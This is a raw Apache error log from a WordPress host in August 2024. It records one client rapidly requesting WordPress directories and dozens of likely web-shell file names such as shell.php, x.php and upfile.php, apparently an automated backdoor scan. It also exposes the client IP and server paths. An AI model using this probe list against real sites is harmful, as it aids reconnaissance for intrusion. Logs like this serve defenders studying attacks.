(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:52.651901 2024] [autoindex:error] [pid 29534:tid 139643831949056] [client 143.198.203.58:39094] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/endpoints/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:52.892337 2024] [autoindex:error] [pid 28891:tid 139643748022016] [client 143.198.203.58:39096] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:53.134282 2024] [autoindex:error] [pid 28889:tid 139643857127168] [client 143.198.203.58:39098] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:53.374622 2024] [autoindex:error] [pid 29534:tid 139643873912576] [client 143.198.203.58:39104] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/sunrise/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:53.615040 2024] [autoindex:error] [pid 28889:tid 139643882305280] [client 143.198.203.58:39106] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/fields/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:53.855825 2024] [autoindex:error] [pid 29534:tid 139643748022016] [client 143.198.203.58:39108] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/crystal/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:54.102818 2024] [autoindex:error] [pid 29534:tid 139643756414720] [client 143.198.203.58:39110] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/themes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:57.354712 2024] [autoindex:error] [pid 29534:tid 139643823556352] [client 143.198.203.58:39120] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:57.609582 2024] [autoindex:error] [pid 29534:tid 139643993650944] [client 143.198.203.58:39124] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/dist/list-reusable-blocks/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:41:57.863191 2024] [autoindex:error] [pid 29534:tid 139643960080128] [client 143.198.203.58:39126] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/media/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:01.537259 2024] [autoindex:error] [pid 28889:tid 139643831949056] [client 143.198.203.58:39136] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Utility/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:03.671878 2024] [autoindex:error] [pid 28891:tid 139643798378240] [client 143.198.203.58:39142] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/plupload/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:05.364704 2024] [autoindex:error] [pid 29534:tid 139643748022016] [client 143.198.203.58:39148] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:05.614416 2024] [autoindex:error] [pid 28891:tid 139643857127168] [client 143.198.203.58:39150] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:07.299973 2024] [autoindex:error] [pid 28891:tid 139643840341760] [client 143.198.203.58:39156] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Proxy/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:07.788749 2024] [autoindex:error] [pid 28890:tid 139643798378240] [client 143.198.203.58:39160] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/freeform/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:13.757210 2024] [autoindex:error] [pid 28891:tid 139643764807424] [client 143.198.203.58:39178] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:15.773611 2024] [:error] [pid 28890:tid 139643781592832] [client 143.198.203.58:39186] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Fri Aug 16 23:42:17.565130 2024] [:error] [pid 29534:tid 139643773200128] [client 143.198.203.58:39192] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/classwithtostring.php [Fri Aug 16 23:42:17.801548 2024] [:error] [pid 28890:tid 139643764807424] [client 143.198.203.58:39194] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cong.php [Fri Aug 16 23:42:18.038391 2024] [:error] [pid 28891:tid 139643756414720] [client 143.198.203.58:39198] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Fri Aug 16 23:42:18.278108 2024] [:error] [pid 29534:tid 139643789985536] [client 143.198.203.58:39200] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class.api.php [Fri Aug 16 23:42:18.514458 2024] [:error] [pid 29534:tid 139643848734464] [client 143.198.203.58:39202] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/1.php [Fri Aug 16 23:42:18.751028 2024] [:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39204] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Fri Aug 16 23:42:19.627413 2024] [autoindex:error] [pid 28891:tid 139643773200128] [client 143.198.203.58:39210] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:21.857845 2024] [:error] [pid 28889:tid 139643756414720] [client 143.198.203.58:39218] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/adminfuns.php [Fri Aug 16 23:42:22.091052 2024] [:error] [pid 28889:tid 139643823556352] [client 143.198.203.58:39220] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Fri Aug 16 23:42:22.324597 2024] [:error] [pid 28889:tid 139643960080128] [client 143.198.203.58:39222] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/test.php [Fri Aug 16 23:42:22.557769 2024] [:error] [pid 29534:tid 139643840341760] [client 143.198.203.58:39224] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/users.php [Fri Aug 16 23:42:22.661477 2024] [:error] [pid 28891:tid 139643739629312] [client 143.198.203.58:39226] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/index.php:17 [Fri Aug 16 23:42:22.661591 2024] [:error] [pid 28891:tid 139643739629312] [client 143.198.203.58:39226] Stack trace: [Fri Aug 16 23:42:22.661608 2024] [:error] [pid 28891:tid 139643739629312] [client 143.198.203.58:39226] #0 {main} [Fri Aug 16 23:42:22.661727 2024] [:error] [pid 28891:tid 139643739629312] [client 143.198.203.58:39226] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/index.php on line 17 [Fri Aug 16 23:42:24.356134 2024] [:error] [pid 28889:tid 139643976865536] [client 143.198.203.58:39234] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/edit.php [Fri Aug 16 23:42:24.590160 2024] [:error] [pid 29534:tid 139643739629312] [client 143.198.203.58:39238] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/network.php [Fri Aug 16 23:42:24.824426 2024] [:error] [pid 29534:tid 139643857127168] [client 143.198.203.58:39240] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/update.php [Fri Aug 16 23:42:25.058572 2024] [:error] [pid 29534:tid 139643823556352] [client 143.198.203.58:39242] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/setup.php [Fri Aug 16 23:42:25.293324 2024] [:error] [pid 29534:tid 139643993650944] [client 143.198.203.58:39244] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Fri Aug 16 23:42:26.926152 2024] [:error] [pid 28891:tid 139643806770944] [client 143.198.203.58:39250] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class.api.php [Fri Aug 16 23:42:27.395435 2024] [:error] [pid 28890:tid 139643873912576] [client 143.198.203.58:39252] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Fri Aug 16 23:42:27.632178 2024] [:error] [pid 28891:tid 139643823556352] [client 143.198.203.58:39254] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cong.php [Fri Aug 16 23:42:27.869655 2024] [:error] [pid 28890:tid 139643831949056] [client 143.198.203.58:39256] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Fri Aug 16 23:42:28.107238 2024] [:error] [pid 29534:tid 139643985258240] [client 143.198.203.58:39260] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/users.php [Fri Aug 16 23:42:28.347636 2024] [:error] [pid 28890:tid 139643798378240] [client 143.198.203.58:39262] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/adminfuns.php [Fri Aug 16 23:42:28.584820 2024] [:error] [pid 29534:tid 139643831949056] [client 143.198.203.58:39264] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/update.php [Fri Aug 16 23:42:28.821747 2024] [:error] [pid 29534:tid 139643722843904] [client 143.198.203.58:39266] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Fri Aug 16 23:42:29.058501 2024] [:error] [pid 29534:tid 139643815163648] [client 143.198.203.58:39268] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/edit.php [Fri Aug 16 23:42:29.295056 2024] [:error] [pid 28890:tid 139643960080128] [client 143.198.203.58:39270] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/network.php [Fri Aug 16 23:42:29.416592 2024] [autoindex:error] [pid 28889:tid 139643739629312] [client 143.198.203.58:39272] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:42:29.531761 2024] [:error] [pid 28891:tid 139643848734464] [client 143.198.203.58:39274] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Aug 16 23:42:29.768723 2024] [:error] [pid 29534:tid 139643748022016] [client 143.198.203.58:39278] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Fri Aug 16 23:42:30.011084 2024] [:error] [pid 28891:tid 139643865519872] [client 143.198.203.58:39280] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/fond.php [Fri Aug 16 23:42:30.247522 2024] [:error] [pid 28889:tid 139643985258240] [client 143.198.203.58:39282] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Aug 16 23:42:30.484562 2024] [:error] [pid 28890:tid 139643731236608] [client 143.198.203.58:39284] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/themes.php [Fri Aug 16 23:42:30.721120 2024] [:error] [pid 29534:tid 139643756414720] [client 143.198.203.58:39286] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Fri Aug 16 23:42:30.957903 2024] [:error] [pid 28891:tid 139643960080128] [client 143.198.203.58:39288] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Aug 16 23:42:32.554729 2024] [:error] [pid 28889:tid 139643848734464] [client 143.198.203.58:39294] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/x.php [Fri Aug 16 23:42:34.448835 2024] [:error] [pid 29534:tid 139643865519872] [client 143.198.203.58:39302] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Fri Aug 16 23:42:34.693717 2024] [:error] [pid 29534:tid 139643976865536] [client 143.198.203.58:39304] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/themes.php [Fri Aug 16 23:42:34.937730 2024] [:error] [pid 28891:tid 139643731236608] [client 143.198.203.58:39306] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Fri Aug 16 23:42:35.181749 2024] [:error] [pid 28891:tid 139643985258240] [client 143.198.203.58:39308] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Fri Aug 16 23:42:35.425983 2024] [:error] [pid 28891:tid 139643756414720] [client 143.198.203.58:39312] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gif.php [Fri Aug 16 23:42:35.670017 2024] [:error] [pid 28891:tid 139643773200128] [client 143.198.203.58:39314] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/LA.php [Fri Aug 16 23:42:35.914032 2024] [:error] [pid 28891:tid 139643739629312] [client 143.198.203.58:39316] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Aug 16 23:42:36.158051 2024] [:error] [pid 28891:tid 139643806770944] [client 143.198.203.58:39318] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Fri Aug 16 23:42:36.401950 2024] [:error] [pid 29534:tid 139643773200128] [client 143.198.203.58:39320] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/sclass_api.php [Fri Aug 16 23:42:38.056123 2024] [:error] [pid 28890:tid 139643815163648] [client 143.198.203.58:39326] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/LA.php [Fri Aug 16 23:42:38.551303 2024] [:error] [pid 29534:tid 139643848734464] [client 143.198.203.58:39330] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Fri Aug 16 23:42:38.797236 2024] [:error] [pid 28889:tid 139643993650944] [client 143.198.203.58:39332] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/lock.php [Fri Aug 16 23:42:39.041936 2024] [:error] [pid 28891:tid 139643831949056] [client 143.198.203.58:39334] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell.php [Fri Aug 16 23:42:39.287283 2024] [:error] [pid 28890:tid 139643756414720] [client 143.198.203.58:39336] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Fri Aug 16 23:42:39.532227 2024] [:error] [pid 28891:tid 139643815163648] [client 143.198.203.58:39338] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/sclass_api.php [Fri Aug 16 23:42:39.781748 2024] [:error] [pid 28891:tid 139643857127168] [client 143.198.203.58:39342] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Fri Aug 16 23:42:40.031355 2024] [:error] [pid 28891:tid 139643840341760] [client 143.198.203.58:39344] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-blog.php [Fri Aug 16 23:42:40.276585 2024] [:error] [pid 28891:tid 139643976865536] [client 143.198.203.58:39346] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/server.php [Fri Aug 16 23:42:40.522854 2024] [:error] [pid 28889:tid 139643731236608] [client 143.198.203.58:39348] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gix.php [Fri Aug 16 23:42:40.768760 2024] [:error] [pid 28891:tid 139643764807424] [client 143.198.203.58:39350] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/autoload_classmap.php [Fri Aug 16 23:42:41.013991 2024] [:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39352] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-load.php [Fri Aug 16 23:42:42.622483 2024] [:error] [pid 28891:tid 139643985258240] [client 143.198.203.58:39360] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell.php [Fri Aug 16 23:42:43.121515 2024] [:error] [pid 28890:tid 139643773200128] [client 143.198.203.58:39362] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/settings.php [Fri Aug 16 23:42:43.373145 2024] [:error] [pid 29534:tid 139643781592832] [client 143.198.203.58:39364] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-sigunq.php [Fri Aug 16 23:42:43.624930 2024] [:error] [pid 28890:tid 139643806770944] [client 143.198.203.58:39366] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Fri Aug 16 23:42:45.240656 2024] [:error] [pid 28890:tid 139643789985536] [client 143.198.203.58:39372] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Fri Aug 16 23:42:45.491635 2024] [:error] [pid 28890:tid 139643823556352] [client 143.198.203.58:39376] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Fri Aug 16 23:42:45.743297 2024] [:error] [pid 28890:tid 139643960080128] [client 143.198.203.58:39378] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-blog.php [Fri Aug 16 23:42:45.996485 2024] [:error] [pid 29534:tid 139643840341760] [client 143.198.203.58:39380] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/server.php [Fri Aug 16 23:42:46.248425 2024] [:error] [pid 28889:tid 139643840341760] [client 143.198.203.58:39382] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/user.php [Fri Aug 16 23:42:48.165125 2024] [:error] [pid 29534:tid 139643968472832] [client 143.198.203.58:39388] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/content.php [Fri Aug 16 23:42:50.236704 2024] [:error] [pid 28890:tid 139643985258240] [client 143.198.203.58:39394] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/doc.php [Fri Aug 16 23:42:50.471955 2024] [:error] [pid 28889:tid 139643815163648] [client 143.198.203.58:39398] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/doc.php [Fri Aug 16 23:42:50.709609 2024] [:error] [pid 29534:tid 139643798378240] [client 143.198.203.58:39400] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/gecko.php [Fri Aug 16 23:42:50.945086 2024] [:error] [pid 29534:tid 139643857127168] [client 143.198.203.58:39402] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Fri Aug 16 23:42:51.180226 2024] [:error] [pid 29534:tid 139643823556352] [client 143.198.203.58:39404] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/top.php [Fri Aug 16 23:42:51.415233 2024] [:error] [pid 29534:tid 139643993650944] [client 143.198.203.58:39406] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/content.php [Fri Aug 16 23:42:53.944589 2024] [:error] [pid 28890:tid 139643993650944] [client 143.198.203.58:39418] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-signup.php [Fri Aug 16 23:42:54.413489 2024] [:error] [pid 29534:tid 139643985258240] [client 143.198.203.58:39420] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/samll.php [Fri Aug 16 23:42:55.950095 2024] [:error] [pid 28890:tid 139643764807424] [client 143.198.203.58:39426] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/system.php [Fri Aug 16 23:42:56.184731 2024] [:error] [pid 29534:tid 139643806770944] [client 143.198.203.58:39430] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/fond.php [Fri Aug 16 23:42:56.419374 2024] [:error] [pid 28890:tid 139643848734464] [client 143.198.203.58:39432] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/delpaths.php [Fri Aug 16 23:43:00.807292 2024] [:error] [pid 29534:tid 139643882305280] [client 143.198.203.58:39446] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Fri Aug 16 23:43:02.355485 2024] [:error] [pid 29534:tid 139643731236608] [client 143.198.203.58:39452] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud1.php [Fri Aug 16 23:43:02.594597 2024] [:error] [pid 29534:tid 139643764807424] [client 143.198.203.58:39454] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Fri Aug 16 23:43:02.833653 2024] [:error] [pid 29534:tid 139643739629312] [client 143.198.203.58:39456] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-theme.php [Fri Aug 16 23:43:03.073299 2024] [:error] [pid 28889:tid 139643756414720] [client 143.198.203.58:39460] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/min.php [Fri Aug 16 23:43:03.312151 2024] [:error] [pid 28889:tid 139643823556352] [client 143.198.203.58:39462] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin1.php [Fri Aug 16 23:43:04.257570 2024] [autoindex:error] [pid 29534:tid 139643865519872] [client 143.198.203.58:39466] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:04.838308 2024] [:error] [pid 29534:tid 139643976865536] [client 143.198.203.58:39470] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/indexx.php [Fri Aug 16 23:43:06.676816 2024] [:error] [pid 28890:tid 139643798378240] [client 143.198.203.58:39476] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/simple.php [Fri Aug 16 23:43:06.917271 2024] [:error] [pid 28891:tid 139643848734464] [client 143.198.203.58:39478] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Fri Aug 16 23:43:07.158201 2024] [:error] [pid 28889:tid 139643960080128] [client 143.198.203.58:39480] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/validation.php [Fri Aug 16 23:43:07.357949 2024] [autoindex:error] [pid 28889:tid 139643865519872] [client 143.198.203.58:39482] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2024/01/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:07.398877 2024] [:error] [pid 29534:tid 139643848734464] [client 143.198.203.58:39484] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-load.php [Fri Aug 16 23:43:07.594202 2024] [autoindex:error] [pid 28890:tid 139643882305280] [client 143.198.203.58:39486] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2024/02/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:07.639154 2024] [:error] [pid 28890:tid 139643857127168] [client 143.198.203.58:39488] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Aug 16 23:43:07.830875 2024] [autoindex:error] [pid 28890:tid 139643731236608] [client 143.198.203.58:39490] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2024/03/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Aug 16 23:43:08.066598 2024] [autoindex:error] [pid 28891:tid 139643865519872] [client 143.198.203.58:39494] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2024/04/: No matching DirectoryIndex 